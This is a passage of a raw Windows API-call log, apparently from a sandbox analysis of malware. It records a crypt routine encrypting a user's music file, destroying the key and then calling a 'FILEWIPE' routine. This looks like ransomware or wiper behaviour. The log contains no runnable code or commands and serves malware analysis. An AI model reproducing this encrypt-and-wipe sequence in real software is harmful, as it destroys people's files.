hHeap=0x8a0000) returned 1 [0184.496] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.496] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.497] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.497] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.497] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.498] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.498] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1bd9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x1be0) returned 1 [0184.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.498] CharLowerBuffW (in: lpsz="byte[7137]", cchLength=0xa | out: lpsz="byte[7137]") returned 0xa [0184.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.499] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.499] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbea018*, pdwDataLen=0x87e820*=0x1bd9, dwBufLen=0x1be0 | out: pbData=0xbea018*, pdwDataLen=0x87e820*=0x1be0) returned 1 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.499] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.500] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.500] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.500] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.503] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.504] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.504] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.504] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0184.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.504] CryptDestroyKey (hKey=0x90aed8) returned 1 [0184.504] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.504] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.504] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.504] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.504] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.504] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.504] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.510] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.510] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.510] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.510] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.510] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.510] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.511] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.511] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.511] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.511] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0184.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.511] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.511] FreeLibrary (hLibModule=0x74f20000) returned 1 [0184.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.511] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.513] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.513] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.515] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.515] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0184.515] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.516] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0xd95b64b0, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 0x90af58 [0184.516] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0184.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0184.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0184.517] CharLowerBuffW (in: lpsz="byte[7129]", cchLength=0xa | out: lpsz="byte[7129]") returned 0xa [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.518] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0184.518] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.518] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.518] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2858 [0184.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2858, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.519] FreeLibrary (hLibModule=0x75c90000) returned 1 [0184.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.519] RtlAllocateHeap 